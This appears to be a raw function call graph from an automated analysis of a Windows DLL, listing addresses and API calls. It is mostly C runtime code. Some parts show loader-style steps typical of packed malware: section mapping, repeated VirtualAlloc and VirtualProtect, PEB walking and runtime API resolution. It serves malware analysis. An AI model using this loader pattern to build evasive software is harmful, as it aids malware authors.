17301 70008008 17292->17301 17295 70008155 17294->17295 17295->17292 17296 7000822b GetModuleHandleExW 17295->17296 17297 7000824a GetProcAddress 17296->17297 17298 7000825f 17296->17298 17297->17298 17299 70008273 FreeLibrary 17298->17299 17300 7000827c 17298->17300 17299->17300 17300->17292 17302 70008014 ___FrameUnwindToState 17301->17302 17317 70006cec RtlEnterCriticalSection 17302->17317 17304 7000801e 17318 70008055 17304->17318 17306 7000802b 17322 70008049 17306->17322 17309 700081a6 17329 7000eb9a GetPEB 17309->17329 17312 700081d5 17315 7000822b _Atexit 3 API calls 17312->17315 17313 700081b5 GetPEB 17313->17312 17314 700081c5 GetCurrentProcess TerminateProcess 17313->17314 17314->17312 17316 700081dd ExitProcess 17315->17316 17317->17304 17320 70008061 ___FrameUnwindToState 17318->17320 17319 700080c2 _Atexit 17319->17306 17320->17319 17325 70008a7c 17320->17325 17328 70006d34 RtlLeaveCriticalSection 17322->17328 17324 70008037 17324->17287 17324->17309 17326 700087ad _Atexit 14 API calls 17325->17326 17327 70008aa7 17326->17327 17327->17319 17328->17324 17330 700081b0 17329->17330 17331 7000ebb4 17329->17331 17330->17312 17330->17313 17333 70009c57 17331->17333 17334 70009bd4 _Atexit 5 API calls 17333->17334 17335 70009c73 17334->17335 17335->17330 17337 700103c0 ___FrameUnwindToState 17336->17337 17338 700096c6 __Getctype 33 API calls 17337->17338 17339 700103c9 17338->17339 17346 7001040f 17339->17346 17349 70006cec RtlEnterCriticalSection 17339->17349 17341 700103e7 17350 70010435 17341->17350 17346->17213 17347 70007827 ___FrameUnwindToState 33 API calls 17348 70010434 17347->17348 17349->17341 17351 700103f8 17350->17351 17352 70010443 __Getctype 17350->17352 17354 70010414 17351->17354 17352->17351 17353 70010168 __Getctype 14 API calls 17352->17353 17353->17351 17357 70006d34 RtlLeaveCriticalSection 17354->17357 17356 7001040b 17356->17346 17356->17347 17357->17356 17359 700096c6 __Getctype 33 API calls 17358->17359 17360 7000f9a8 17359->17360 17363 7000f8b6 17360->17363 17364 7000f8c2 ___FrameUnwindToState 17363->17364 17366 7000f8dc 17364->17366 17374 70006cec RtlEnterCriticalSection 17364->17374 17367 7000f8e3 17366->17367 17369 70007827 ___FrameUnwindToState 33 API calls 17366->17369 17367->17219 17368 7000f918 17375 7000f935 17368->17375 17371 7000f955 17369->17371 17372 7000f8ec 17372->17368 17373 700074e6 _free 14 API calls 17372->17373 17373->17368 17374->17372 17378 70006d34 RtlLeaveCriticalSection 17375->17378 17377 7000f93c 17377->17366 17378->17377 17380 70009bd4 _Atexit 5 API calls 17379->17380 17381 70009a6d 17380->17381 17381->17168 17382 70009fa3 17381->17382 17385 70009af3 17382->17385 17384 70009fae std::_Locinfo::_Locinfo_ctor 17384->17169 17386 70009bd4 _Atexit 5 API calls 17385->17386 17387 70009b09 17386->17387 17387->17384 16322 6ffa1768 ConvertStringSecurityDescriptorToSecurityDescriptorA 16323 6ffa1823 3 API calls 16322->16323 16324 6ffa17c3 16323->16324 16325 6ffa1818 ExitThread 16324->16325 16326 6ffa17c7 lstrlenW 16324->16326 16332 6ffa10ed GetSystemTimeAsFileTime _aulldiv _snwprintf 16326->16332 16330 6ffa17ea 16343 6ffa1202 16330->16343 16333 6ffa114b CreateFileMappingW 16332->16333 16334 6ffa1146 16332->16334 16335 6ffa11ae GetLastError 16333->16335 16336 6ffa1166 16333->16336 16334->16333 16339 6ffa118f 16335->16339 16337 6ffa117f MapViewOfFile 16336->16337 16338 6ffa1171 GetLastError 16336->16338 16337->16339 16341 6ffa119d GetLastError 16337->16341 16338->16337 16340 6ffa117a 16338->16340 16339->16330 16342 6ffa11a5 CloseHandle 16340->16342 16341->16339 16341->16342 16342->16339 16356 6ffa1e91 16343->16356 16346 6ffa129a QueryPerformanceFrequency 16346->16325 16348 6ffa124c 16349 6ffa1288 16348->16349 16373 6ffa1a0a 16348->16373 16384 6ffa1e7c HeapFree 16349->16384 16355 6ffa1280 GetLastError 16355->16349 16385 6ffa1d8b HeapAlloc 16356->16385 16358 6ffa1e9f 16359 6ffa1ea9 GetModuleHandleA GetProcAddress 16358->16359 16364 6ffa123e 16358->16364 16360 6ffa1ee0 GetProcAddress 16359->16360 16368 6ffa1f4e 16359->16368 16361 6ffa1ef6 GetProcAddress 16360->16361 16360->16368 16363 6ffa1f0c GetProcAddress 16361->16363 16361->16368 16365 6ffa1f22 GetProcAddress 16363->16365 16363->16368 16364->16346 16369 6ffa16e7 memcpy 16364->16369 16366 6ffa1f38 16365->16366 16365->16368 16386 6ffa1382 NtCreateSection 16366->16386 16368->16364 16392 6ffa1e7c HeapFree 16368->16392 16370 6ffa1720 16369->16370 16371 6ffa1757 16369->16371 16370->16371 16372 6ffa1739 memcpy 16370->16372 16371->16348 16372->16370 16374 6ffa1a2d 16373->16374 16376 6ffa125d 16373->16376 16375 6ffa1a3e LoadLibraryA 16374->16375 16374->16376 16378 6ffa1aa7 16374->16378 16375->16374 16375->16376 16376->16349 16379 6ffa2042 VirtualProtect 16376->16379 16377 6ffa1ab0 GetProcAddress 16377->16378 16378->16374 16378->16377 16380 6ffa126b 16379->16380 16381 6ffa208b 16379->16381 16380->16349 16380->16355 16381->16380 16382 6ffa20e1 VirtualProtect 16381->16382 16382->16381 16383 6ffa20f6 GetLastError 16382->16383 16383->16381 16384->16346 16385->16358 16387 6ffa13e6 16386->16387 16391 6ffa1413 16386->16391 16393 6ffa1b4a NtMapViewOfSection 16387->16393 16390 6ffa13fa memset 16390->16391 16391->16368 16392->16364 16394 6ffa13f4 16393->16394 16394->16390 16394->16391 17418 70000e14 17423 700001ff 17418->17423 17420 70000e22 __Deletegloballocale 17429 70000257 17420->17429 17422 70000e3c 17424 70000215 17423->17424 17425 7000020e 17423->17425 17426 70000213 17424->17426 17440 70000e65 RtlEnterCriticalSection 17424->17440 17436 70006d4b 17425->17436 17426->17420 17430 70000261 17429->17430 17431 70006d59 17429->17431 17433 70000274 17430->17433 17442 70000e73 RtlLeaveCriticalSection 17430->17442 17443 70006d34 RtlLeaveCriticalSection 17431->17443 17433->17422 17434 70006d60 17434->17422 17437 70006d50 17436->17437 17441 70006cec RtlEnterCriticalSection 17437->17441 17439 70006d57 17439->17426 17440->17426 17441->17439 17442->17433 17443->17434 16860 70001619 16861 70001625 ___FrameUnwindToState 16860->16861 16876 70001a4f 16861->16876 16863 7000162c 16864 70001659 16863->16864 16875 70001631 ___scrt_is_nonwritable_in_current_image ___FrameUnwindToState _Atexit 16863->16875 16884 70002116 IsProcessorFeaturePresent 16863->16884 16888 700019b2 16864->16888 16867 70001668 __RTC_Initialize 16867->16875 16891 70001c29 16867->16891 16871 70001680 16872 70001c29 17 API calls 16871->16872 16873 7000168c ___scrt_initialize_default_local_stdio_options 16872->16873 16873->16875 16895 70001987 16873->16895 16877 70001a58 16876->16877 16899 700022eb IsProcessorFeaturePresent 16877->16899 16881 70001a69 16882 70001a6d 16881->16882 16910 70005ee5 16881->16910 16882->16863 16885 7000212c ___scrt_fastfail 16884->16885 16886 700021d4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16885->16886 16887 7000221e 16886->16887 16887->16864 16959 70001a88 16888->16959 16890 700019b9 16890->16867 16964 70001bee 16891->16964 16894 700020d5 RtlInitializeSListHead 16894->16871 16896 7000198c ___scrt_release_startup_lock 16895->16896 16897 700022eb ___isa_available_init IsProcessorFeaturePresent 16896->16897 16898 70001995 16896->16898 16897->16898 16898->16875 16900 70001a64 16899->16900 16901 70005ea6 16900->16901 16902 70005eab ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 16901->16902 16918 7000629e 16902->16918 16906 70005ec1 16907 70005ecc 16906->16907 16932 700062da 16906->16932 16907->16881 16909 70005eb9 16909->16881 16911 70005eff 16910->16911 16912 70005eee 16910->16912 16911->16882 16913 700060af ___vcrt_uninitialize_ptd 6 API calls 16912->16913 16914 70005ef3 16913->16914 16915 700062da ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16914->16915 16916 70005ef8 16915->16916 16955 70006595 16916->16955 16921 700062a7 16918->16921 16920 700062d0 16923 700062da ___vcrt_uninitialize_locks RtlDeleteCriticalSection 16920->16923 16921->16920 16922 70005eb5 16921->16922 16936 70006515 16921->16936 16922->16909 16924 7000607c 16922->16924 16923->16922 16941 7000642a 16924->16941 16926 70006086 16927 70006091 16926->16927 16928 700064d8 ___vcrt_FlsSetValue 6 API calls 16926->16928 16927->16906 16929 7000609f 16928->16929 16930 700060ac 16929->16930 16946 700060af 16929->16946 16930->16906 16933 70006304 16932->16933 16934 700062e5 16932->16934 16933->16909 16935 700062ef RtlDeleteCriticalSection 16934->16935 16935->16933 16935->16935 16937 70006309 try_get_function 5 API calls 16936->16937 16938 7000652f 16937->16938 16939 7000654c InitializeCriticalSectionAndSpinCount 16938->16939 16940 70006538 16938->16940 16939->16940 16940->16921 16942 70006309 try_get_function 5 API calls 16941->16942 16943 70006444 16942->16943 16944 7000645c TlsAlloc 16943->16944 16945 7000644d 16943->16945 16945->16926 16947 700060bf 16946->16947 16948 700060b9 16946->16948 16947->16927 16950 70006464 16948->16950 16951 70006309 try_get_function 5 API calls 16950->16951 16952 7000647e 16951->16952 16953 70006495 TlsFree 16952->16953 16954 7000648a 16952->16954 16953->16954 16954->16947 16956 700065c4 16955->16956 16957 7000659e 16955->16957 16956->16911 16957->16956 16958 700065ae FreeLibrary 16957->16958 16958->16957 16960 70001a96 16959->16960 16963 70001a9b ___scrt_initialize_onexit_tables ___scrt_release_startup_lock 16959->16963 16961 70002116 ___scrt_fastfail 4 API calls 16960->16961 16960->16963 16962 70001b1e 16961->16962 16963->16890 16965 70001c12 16964->16965 16966 70001c0b 16964->16966 16973 70008ad2 16965->16973 16970 70008a66 16966->16970 16969 7000167b 16969->16894 16971 70008ad2 __onexit 17 API calls 16970->16971 16972 70008a78 16971->16972 16972->16969 16976 70008808 16973->16976 16977 70008814 ___FrameUnwindToState 16976->16977 16984 70006cec RtlEnterCriticalSection 16977->16984 16979 70008822 16985 70008863 16979->16985 16981 7000882f 16995 70008857 16981->16995 16984->16979 16986 7000887f 16985->16986 16987 700088f6 __onexit __crt_fast_encode_pointer 16985->16987 16986->16987 16988 700088d6 16986->16988 16998 7000fcf9 16986->16998 16987->16981 16988->16987 16990 7000fcf9 __onexit 17 API calls 16988->16990 16992 700088ec 16990->16992 16991 700088cc 16993 700074e6 _free 14 API calls 16991->16993 16994 700074e6 _free 14 API calls 16992->16994 16993->16988 16994->16987 17031 70006d34 RtlLeaveCriticalSection 16995->17031 16997 70008840 16997->16969 16999 7000fd21 16998->16999 17000 7000fd06 16998->17000 17001 7000fd30 16999->17001 17007 70013773 16999->17007 17000->16999 17002 7000fd12 17000->17002 17012 7000786b 17001->17012 17004 70006ddb __Wcscoll 14 API calls 17002->17004 17006 7000fd17 ___scrt_fastfail 17004->17006 17006->16991 17008 70013793 RtlSizeHeap 17007->17008 17009 7001377e 17007->17009 17008->17001 17010 70006ddb __Wcscoll 14 API calls 17009->17010 17011 70013783 __cftoe 17010->17011 17011->17001 17013 70007883 17012->17013 17014 70007878 17012->17014 17016 7000788b 17013->17016 17022 70007894 __Wcsxfrm 17013->17022 17024 70007520 17014->17024 17019 700074e6 _free 14 API calls 17016->17019 17017 70007899 17020 70006ddb __Wcscoll 14 API calls 17017->17020 17018 700078be RtlReAllocateHeap 17021 70007880 17018->17021 17018->17022 17019->17021 17020->17021 17021->17006 17022->17017 17022->17018 17023 70007d94 new 2 API calls 17022->17023 17023->17022 17025 7000755e 17024->17025 17029 7000752e __Wcsxfrm 17024->17029 17026 70006ddb __Wcscoll 14 API calls 17025->17026 17028 7000755c 17026->17028 17027 70007549 RtlAllocateHeap 17027->17028 17027->17029 17028->17021 17029->17025 17029->17027 17030 70007d94 new 2 API calls 17029->17030 17030->17029 17031->16997 16804 700017a8 16805 700017b4 ___FrameUnwindToState 16804->16805 16806 700017dd dllmain_raw 16805->16806 16807 700017d8 16805->16807 16810 700017c3 ___FrameUnwindToState 16805->16810 16808 700017f7 dllmain_crt_dispatch 16806->16808 16806->16810 16817 6ffee850 16807->16817 16808->16807 16808->16810 16812 70001844 16812->16810 16813 7000184d dllmain_crt_dispatch 16812->16813 16813->16810 16815 70001860 dllmain_raw 16813->16815 16814 6ffee850 17 API calls 16816 70001830 dllmain_crt_dispatch dllmain_raw 16814->16816 16815->16810 16816->16812 16818 6ffee8a6 16817->16818 16821 6ffeb990 16818->16821 16822 6ffeb9eb 16821->16822 16823 6ffed569 16822->16823 16824 6ffecd2f GetEnvironmentVariableW 16822->16824 16825 6ffece44 Sleep 16822->16825 16826 6ffedaa4 16823->16826 16830 7004a96d 16823->16830 16824->16822 16825->16822 16850 70001592 16826->16850 16828 6ffedc96 16828->16812 16828->16814 16831 7004a9b2 16830->16831 16832 7004aa4e VirtualAlloc 16831->16832 16833 7004aa10 VirtualAlloc 16831->16833 16834 7004aa94 16832->16834 16833->16832 16835 7004aaad VirtualAlloc 16834->16835 16855 7004a61c 16835->16855 16838 7004abe7 VirtualProtect 16840 7004ac06 16838->16840 16842 7004ac39 16838->16842 16839 7004ab16 16839->16838 16841 7004ac14 VirtualProtect 16840->16841 16840->16842 16841->16840 16843 7004acbb VirtualProtect 16842->16843 16844 7004acf6 VirtualProtect 16843->16844 16846 7004ad53 VirtualFree GetPEB 16844->16846 16847 7004ad7f 16846->16847 16857 7004a89c GetPEB 16847->16857 16849 7004adc3 16851 7000159b 16850->16851 16852 7000159d 16850->16852 16851->16828 16859 70001e38 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16852->16859 16854 70001f57 16854->16828 16856 7004a62b VirtualFree 16855->16856 16856->16839 16858 7004a8cc 16857->16858 16858->16849 16859->16854 19682 7000172b 19683 70001737 ___FrameUnwindToState 19682->19683 19684 70001740 ___FrameUnwindToState 19683->19684 19685 70001766 19683->19685 19686 70002116 ___scrt_fastfail 4 API calls 19683->19686 19692 70001a1f 19685->19692 19686->19685 19688 7000176b 19701 70001799 19688->19701 19690 7000177e 19704 70001bc6 19690->19704 19693 70001a24 ___scrt_release_startup_lock 19692->19693 19694 70001a28 19693->19694 19696 70001a34 19693->19696 19695 70008a7c _Atexit 14 API calls 19694->19695 19697 70001a32 19695->19697 19698 70001a41 19696->19698 19699 70008142 _Atexit 23 API calls 19696->19699 19697->19688 19698->19688 19700 70008298 19699->19700 19700->19688 19710 70001a42 19701->19710 19703 7000179e ___scrt_release_startup_lock 19703->19690 19705 70001bd2 19704->19705 19709 70001be8 19705->19709 19727 70008c28 19705->19727 19707 70001be0 19708 70005ee5 ___vcrt_uninitialize 8 API calls 19707->19708 19708->19709 19709->19684 19715 70008c58 19710->19715 19713 700060af ___vcrt_uninitialize_ptd 6 API calls 19714 70005f09 19713->19714 19714->19703 19718 700098fe 19715->19718 19719 70001a49 19718->19719 19720 70009908 19718->19720 19719->19713 19722 70009d49 19720->19722 19723 70009bd4 _Atexit 5 API calls 19722->19723 19724 70009d65 19723->19724 19725 70009d80 TlsFree 19724->19725 19726 70009d6e 19724->19726 19726->19719 19728 70008c33 19727->19728 19729 70008c45 ___scrt_uninitialize_crt 19727->19729 19730 70008c41 19728->19730 19732 700100e2 19728->19732 19729->19707 19730->19707 19735 7000ff90 19732->19735 19738 7000fee4 19735->19738 19739 7000fef0 ___FrameUnwindToState 19738->19739 19746 70006cec RtlEnterCriticalSection 19739->19746 19741 7000fefa ___scrt_uninitialize_crt 19742 7000ff66 19741->19742 19747 7000fe58 19741->19747 19755 7000ff84 19742->19755 19746->19741 19748 7000fe64 ___FrameUnwindToState 19747->19748 19758 7000d34b RtlEnterCriticalSection 19748->19758 19750 7000fe6e ___scrt_uninitialize_crt 19751 7000fea7 19750->19751 19759 7001009a 19750->19759 19769 7000fed8 19751->19769 19889 70006d34 RtlLeaveCriticalSection 19755->19889 19757 7000ff72 19757->19730 19758->19750 19760 700100b0 19759->19760 19761 700100a7 19759->19761 19772 70010035 19760->19772 19762 7000ff90 ___scrt_uninitialize_crt 62 API calls 19761->19762 19765 700100ad 19762->19765 19765->19751 19767 700100cc 19783 70013848 19767->19783 19888 7000d35f RtlLeaveCriticalSection 19769->19888 19771 7000fec6 19771->19741 19773 70010072 19772->19773 19774 7001004d 19772->19774 19773->19765 19778 7000d210 19773->19778 19774->19773 19775 7000d210 ___scrt_uninitialize_crt 14 API calls 19774->19775 19776 7001006b 19775->19776 19792 7001403e 19776->19792 19779 7000d231 19778->19779 19780 7000d21c 19778->19780 19779->19767 19781 70006ddb __Wcscoll 14 API calls 19780->19781 19782 7000d221 __cftoe 19781->19782 19782->19767 19784 70013866 19783->19784 19785 70013859 19783->19785 19787 700138af 19784->19787 19789 7001388d 19784->19789 19786 70006ddb __Wcscoll 14 API calls 19785->19786 19791 7001385e __cftoe 19786->19791 19788 70006ddb __Wcscoll 14 API calls 19787->19788 19788->19791 19859 700137a6 19789->19859 19791->19765 19793 7001404a ___FrameUnwindToState 19792->19793 19794 70014052 19793->19794 19795 7001406a 19793->19795 19796 70006dc8 __dosmaperr 14 API calls 19794->19796 19797 70014105 19795->19797 19801 7001409c 19795->19801 19798 70014057 19796->19798 19799 70006dc8 __dosmaperr 14 API calls 19797->19799 19800 70006ddb __Wcscoll 14 API calls 19798->19800 19802 7001410a 19799->19802 19806 7001405f __cftoe 19800->19806 19815 70012cfb RtlEnterCriticalSection 19801->19815 19804 70006ddb __Wcscoll 14 API calls 19802->19804 19804->19806 19805 700140a2 19807 700140d3 19805->19807 19808 700140be 19805->19808 19806->19773 19816 70014130 19807->19816 19810 70006ddb __Wcscoll 14 API calls 19808->19810 19812 700140c3 19810->19812 19811 700140ce 19856 700140fd 19811->19856 19813 70006dc8 __dosmaperr 14 API calls 19812->19813 19813->19811 19815->19805 19817 70014152 19816->19817 19826 70014163 __cftoe 19816->19826 19818 70014156 19817->19818 19820 700141a6 19817->19820 19819 70006dc8 __dosmaperr 14 API calls 19818->19819 19821 7001415b 19819->19821 19822 700141b9 19820->19822 19824 70014ac9 ___scrt_uninitialize_crt 16 API calls 19820->19824 19823 70006ddb __Wcscoll 14 API calls 19821->19823 19825 70013cd7 ___scrt_uninitialize_crt 34 API calls 19822->19825 19823->19826 19824->19822 19827 700141ca 19825->19827 19826->19811 19828 700141cf 19827->19828 19829 7001420e 19827->19829 19832 700141f8 19828->19832 19837 700141d3 19828->19837 19830 70014222 19829->19830 19831 70014267 WriteFile 19829->19831 19835 70014257 19830->19835 19836 7001422d 19830->19836 19833 7001428b GetLastError 19831->19833 19838 700141ee 19831->19838 19834 700138c5 ___scrt_uninitialize_crt 39 API calls 19832->19834 19833->19838 19834->19838 19842 70013d48 ___scrt_uninitialize_crt 6 API calls 19835->19842 19839 70014232 19836->19839 19840 70014247 19836->19840 19837->19838 19841 70013c6f ___scrt_uninitialize_crt 6 API calls 19837->19841 19838->19826 19844 700142b1 19838->19844 19845 700142db 19838->19845 19839->19838 19846 70013e23 ___scrt_uninitialize_crt 6 API calls 19839->19846 19843 70013f0c ___scrt_uninitialize_crt 7 API calls 19840->19843 19841->19838 19842->19838 19843->19838 19847 700142b8 19844->19847 19848 700142cf 19844->19848 19845->19826 19849 70006ddb __Wcscoll 14 API calls 19845->19849 19846->19838 19850 70006ddb __Wcscoll 14 API calls 19847->19850 19851 70006da5 __dosmaperr 14 API calls 19848->19851 19852 700142f3 19849->19852 19853 700142bd 19850->19853 19851->19826 19854 70006dc8 __dosmaperr 14 API calls 19852->19854 19855 70006dc8 __dosmaperr 14 API calls 19853->19855 19854->19826 19855->19826 19857 70012d1e ___scrt_uninitialize_crt RtlLeaveCriticalSection 19856->19857 19858 70014103 19857->19858 19858->19806 19860 700137b2 ___FrameUnwindToState 19859->19860 19873 70012cfb RtlEnterCriticalSection 19860->19873 19862 700137c1 19863 70013808 19862->19863 19874 70012dd2 19862->19874 19865 70006ddb __Wcscoll 14 API calls 19863->19865 19867 7001380d 19865->19867 19866 700137ed FlushFileBuffers 19866->19867 19868 700137f9 19866->19868 19885 7001383c 19867->19885 19869 70006dc8 __dosmaperr 14 API calls 19868->19869 19871 700137fe GetLastError 19869->19871 19871->19863 19873->19862 19875 70012ddf 19874->19875 19877 70012df4 19874->19877 19876 70006dc8 __dosmaperr 14 API calls 19875->19876 19879 70012de4 19876->19879 19878 70006dc8 __dosmaperr 14 API calls 19877->19878 19880 70012e19 19877->19880 19881 70012e24 19878->19881 19882 70006ddb __Wcscoll 14 API calls 19879->19882 19880->19866 19883 70006ddb __Wcscoll 14 API calls 19881->19883 19884 70012dec __cftoe 19882->19884 19883->19884 19884->19866 19886 70012d1e ___scrt_uninitialize_crt RtlLeaveCriticalSection 19885->19886 19887 70013825 19886->19887 19887->19791 19888->19771 19889->19757 19197 700082b9 19198 700082d0 19197->19198 19204 700082c9 __cftoe 19197->19204 19199 700082f1 19198->19199 19200 700082db 19198->19200 19219 7000f956 19199->19219 19202 70006ddb __Wcscoll 14 API calls 19200->19202 19202->19204 19209 70008566 14 API calls 19210 7000834c 19209->19210 19211 70008361 19210->19211 19212 70008355 19210->19212 19214 700083ef 33 API calls 19211->19214 19213 70006ddb __Wcscoll 14 API calls 19212->19213 19218 7000835a 19213->19218 19216 70008379 19214->19216 19215 700074e6 _free 14 API calls 19215->19204 19217 700074e6 _free 14 API calls 19216->19217 19216->19218 19217->19218 19218->19215 19220 700082f7 19219->19220 19221 7000f95f 19219->19221 19225 7000f397 GetModuleFileNameW 19220->19225 19241 70009783 19221->19241 19226 7000f3c6 GetLastError 19225->19226 19227 7000f3d7 19225->19227 19228 70006da5 __dosmaperr 14 API calls 19226->19228 19229 7000f1a9 33 API calls 19227->19229 19232 7000f3d2 19228->19232 19230 7000f408 19229->19230 19401 7000f2d0 19230->19401 19233 70001592 ctype 4 API calls 19232->19233 19234 7000830a 19233->19234 19235 700083ef 19234->19235 19237 70008414 19235->19237 19236 700074ce __Getcvt 33 API calls 19236->19237 19237->19236 19239 70008474 19237->19239 19238 7000833f 19238->19209 19239->19238 19240 700074ce __Getcvt 33 API calls 19239->19240 19240->19239 19242 70009794 19241->19242 19243 7000978e 19241->19243 19244 70009dc7 _Atexit 6 API calls 19242->19244 19265 7000979a 19242->19265 19245 70009d88 _Atexit 6 API calls 19243->19245 19246 700097ae 19244->19246 19245->19242 19247 70007341 __Getctype 14 API calls 19246->19247 19246->19265 19249 700097be 19247->19249 19248 70007827 ___FrameUnwindToState 33 API calls 19250 7000981c 19248->19250 19251 700097c6 19249->19251 19252 700097db 19249->19252 19254 70009dc7 _Atexit 6 API calls 19251->19254 19255 70009dc7 _Atexit 6 API calls 19252->19255 19253 70009813 19266 7000f79d 19253->19266 19262 700097d2 19254->19262 19256 700097e7 19255->19256 19257 700097fa 19256->19257 19258 700097eb 19256->19258 19260 700094c8 _Atexit 14 API calls 19257->19260 19259 70009dc7 _Atexit 6 API calls 19258->19259 19259->19262 19263 70009805 19260->19263 19261 700074e6 _free 14 API calls 19261->19265 19262->19261 19264 700074e6 _free 14 API calls 19263->19264 19264->19265 19265->19248 19265->19253 19267 7000f8b6 __cftoe 33 API calls 19266->19267 19268 7000f7b0 19267->19268 19285 7000f546 19268->19285 19271 7000f7c9 19271->19220 19272 70007520 __Wcsxfrm 15 API calls 19273 7000f7da 19272->19273 19284 7000f80c 19273->19284 19292 7000f9b1 19273->19292 19276 700074e6 _free 14 API calls 19278 7000f81a 19276->19278 19277 7000f807 19279 70006ddb __Wcscoll 14 API calls 19277->19279 19278->19220 19279->19284 19280 7000f84e 19280->19284 19303 7000f438 19280->19303 19281 7000f822 19281->19280 19282 700074e6 _free 14 API calls 19281->19282 19282->19280 19284->19276 19286 700073c2 __cftoe 33 API calls 19285->19286 19287 7000f558 19286->19287 19288 7000f567 GetOEMCP 19287->19288 19289 7000f579 19287->19289 19290 7000f590 19288->19290 19289->19290 19291 7000f57e GetACP 19289->19291 19290->19271 19290->19272 19291->19290 19293 7000f546 35 API calls 19292->19293 19294 7000f9d1 19293->19294 19296 7000fa0b IsValidCodePage 19294->19296 19300 7000fa47 ___scrt_fastfail 19294->19300 19295 70001592 ctype 4 API calls 19297 7000f7ff 19295->19297 19298 7000fa1d 19296->19298 19296->19300 19297->19277 19297->19281 19299 7000fa4c GetCPInfo 19298->19299 19301 7000fa26 ___scrt_fastfail 19298->19301 19299->19300 19299->19301 19300->19295 19311 7000f61c 19301->19311 19304 7000f444 ___FrameUnwindToState 19303->19304 19379 70006cec RtlEnterCriticalSection 19304->19379 19306 7000f44e 19380 7000f485 19306->19380 19312 7000f644 GetCPInfo 19311->19312 19321 7000f70d 19311->19321 19313 7000f65c 19312->19313 19312->19321 19322 7000a306 19313->19322 19314 70001592 ctype 4 API calls 19316 7000f79b 19314->19316 19316->19300 19320 7000a5f3 37 API calls 19320->19321 19321->19314 19323 700073c2 __cftoe 33 API calls 19322->19323 19324 7000a326 19323->19324 19325 7000e88f __fassign MultiByteToWideChar 19324->19325 19327 7000a353 19325->19327 19326 7000a3e4 19328 70001592 ctype 4 API calls 19326->19328 19327->19326 19330 70007520 __Wcsxfrm 15 API calls 19327->19330 19333 7000a379 std::_Locinfo::_Locinfo_ctor ___scrt_fastfail 19327->19333 19331 7000a407 19328->19331 19329 7000a3de 19332 70000e81 __freea 14 API calls 19329->19332 19330->19333 19337 7000a5f3 19331->19337 19332->19326 19333->19329 19334 7000e88f __fassign MultiByteToWideChar 19333->19334 19335 7000a3c7 19334->19335 19335->19329 19336 7000a3ce GetStringTypeW 19335->19336 19336->19329 19338 700073c2 __cftoe 33 API calls 19337->19338 19339 7000a606 19338->19339 19342 7000a409 19339->19342 19343 7000a424 19342->19343 19344 7000e88f __fassign MultiByteToWideChar 19343->19344 19347 7000a468 19344->19347 19345 7000a5cd 19346 70001592 ctype 4 API calls 19345->19346 19348 7000a5e0 19346->19348 19347->19345 19349 70007520 __Wcsxfrm 15 API calls 19347->19349 19354 7000a48d std::_Locinfo::_Locinfo_ctor 19347->19354 19348->19320 19349->19354 19350 7000a532 19353 70000e81 __freea 14 API calls 19350->19353 19351 7000e88f __fassign MultiByteToWideChar 19352 7000a4d3 19351->19352 19352->19350 19370 70009f46 19352->19370 19353->19345 19354->19350 19354->19351 19357 7000a541 19359 70007520 __Wcsxfrm 15 API calls 19357->19359 19363 7000a553 std::_Locinfo::_Locinfo_ctor 19357->19363 19358 7000a509 19358->19350 19360 70009f46 std::_Locinfo::_Locinfo_ctor 6 API calls 19358->19360 19359->19363 19360->19350 19361 7000a5be 19362 70000e81 __freea 14 API calls 19361->19362 19362->19350 19363->19361 19364 70009f46 std::_Locinfo::_Locinfo_ctor 6 API calls 19363->19364 19365 7000a59b 19364->19365 19365->19361 19366 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19365->19366 19367 7000a5b5 19366->19367 19367->19361 19368 7000a5ea 19367->19368 19369 70000e81 __freea 14 API calls 19368->19369 19369->19350 19376 70009ad9 19370->19376 19373 70009fa3 std::_Locinfo::_Locinfo_ctor 5 API calls 19374 70009f97 LCMapStringW 19373->19374 19375 70009f57 19374->19375 19375->19350 19375->19357 19375->19358 19377 70009bd4 _Atexit 5 API calls 19376->19377 19378 70009aef 19377->19378 19378->19373 19378->19375 19379->19306 19390 7000fba4 19380->19390 19382 7000f4a7 19383 7000fba4 14 API calls 19382->19383 19384 7000f4c6 19383->19384 19385 7000f45b 19384->19385 19386 700074e6 _free 14 API calls 19384->19386 19387 7000f479 19385->19387 19386->19385 19400 70006d34 RtlLeaveCriticalSection 19387->19400 19389 7000f467 19389->19284 19391 7000fbb5 19390->19391 19398 7000fbb1 __cftoe __Wcsxfrm 19390->19398 19392 7000fbbc 19391->19392 19394 7000fbcf ___scrt_fastfail 19391->19394 19393 70006ddb __Wcscoll 14 API calls 19392->19393 19393->19398 19395 7000fc06 19394->19395 19396 7000fbfd 19394->19396 19394->19398 19395->19398 19399 70006ddb __Wcscoll 14 API calls 19395->19399 19397 70006ddb __Wcscoll 14 API calls 19396->19397 19397->19398 19398->19382 19399->19398 19400->19389 19402 7000f2ec 19401->19402 19403 7000f2dd 19401->19403 19404 7000f2f4 19402->19404 19405 7000f319 19402->19405 19403->19232 19404->19403 19422 70007cec 19404->19422 19406 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19405->19406 19408 7000f329 19406->19408 19409 7000f330 GetLastError 19408->19409 19410 7000f346 19408->19410 19411 70006da5 __dosmaperr 14 API calls 19409->19411 19412 7000f357 19410->19412 19414 70007cec 14 API calls 19410->19414 19413 7000f33c 19411->19413 19412->19403 19415 7000e90b std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19412->19415 19416 70006ddb __Wcscoll 14 API calls 19413->19416 19414->19412 19417 7000f36f 19415->19417 19416->19403 19417->19403 19418 7000f376 GetLastError 19417->19418 19419 70006da5 __dosmaperr 14 API calls 19418->19419 19420 7000f382 19419->19420 19421 70006ddb __Wcscoll 14 API calls 19420->19421 19421->19403 19423 70007cf7 19422->19423 19424 70006ddb __Wcscoll 14 API calls 19423->19424 19425 70007d00 19424->19425 19425->19403 16652 700015c6 16653 700015d1 16652->16653 16654 70001604 dllmain_crt_process_detach 16652->16654 16655 700015f6 dllmain_crt_process_attach 16653->16655 16656 700015d6 16653->16656 16661 700015e0 16654->16661 16655->16661 16657 700015ec 16656->16657 16658 700015db 16656->16658 16667 700019c0 16657->16667 16658->16661 16662 700019df 16658->16662 16675 70008c20 16662->16675 16782 70005ecf 16667->16782 16670 700019c9 16670->16661 16673 700019dc 16673->16661 16674 70005eda 21 API calls 16674->16670 16681 7000969a 16675->16681 16678 70005eda 16747 70005fa4 16678->16747 16682 